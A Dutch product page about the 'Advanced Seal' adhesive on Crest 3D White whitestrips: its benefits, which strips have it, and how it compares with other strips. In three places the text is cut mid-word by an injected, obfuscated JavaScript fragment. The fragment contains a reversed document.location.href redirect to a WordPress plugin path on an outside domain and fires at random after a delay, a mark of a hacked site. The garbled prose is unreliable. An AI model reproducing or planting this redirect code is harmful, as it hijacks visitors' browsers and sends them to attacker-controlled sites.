Wat zijn de voordelen van de Advanced Seal?

Whitestrips zijn soms lastig te bevestigen, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen Crest 3D White net begon waren de whitestrips enorm groot. Ze waren niet makkelijk te bevestigen. Je moest in een stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toel blijven zitten en kon niet rondlopen anders zouden ze misschien verplaatsen. Crest 3D White is al jaren opzoek naar de beste pasvorm en de makkelijkste manier van tanden bleken. Je tanden bleken tijdens het doen van de afwas? Het kijken van Goeden tijden slechte tijden? Dat kan tegenwoordig allemaal met de Advanced Seal techniek.

Welke whitestrips hebben Advanced Seal?

Er zijn twee typen whitestrips die de Advanced Seal techniek hebben. Dat zijn Glamours White en de Supreme FlexFit. Het makkelijkst te herkennen aan de paars/blauwe doos. Alle bovenstaande voordelen die hierboven staan zitten verwerkt in de twee whitestrips. Dit zijn de beste whitestrips die verkrijgbaar zijn. Met deze whitestrips kan je tijdens het dragen van de strips alle dagelijkse dingen blijven doen. Aan de gebruiksaanwijzing veranderd niks, het opplakken van de whitestrips blijft hetzelfde. Na het opplakken van de whitestrips moet je de overgebleven randjes van de strips omvouwen naar de achterkant van de tanden. Dit zorgt ervoor dat de volledige tanden behandeld worden door de strips. Door het naar achterplakken van de strips blijven ze ook beter zitten en kan je makkelijk alles blijven doen.

Zijn de andere Whitestrips minder goed?

NEE, de andere whitestrips werken niet minder goed. Ze hebben een andere bevestigingsgel erop zitten. Tijdens het dragen van de plakstrips moet je rustiger aan doen en ervoor zorgen dat ze niet verplaatsen. De werking van de strips zal niet minder worden, maar als ze verplaatsen kan het wel ervoor zorgen dat er plekjes overgeslagen worden. Dit zal je makkelijk kunnen herstellen door de volgende dag ervoor te zorgen dat je strips niet verplaatsen. Het dragen van de whitestrips van Crest is comfortabel en zal niet toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot last zijn.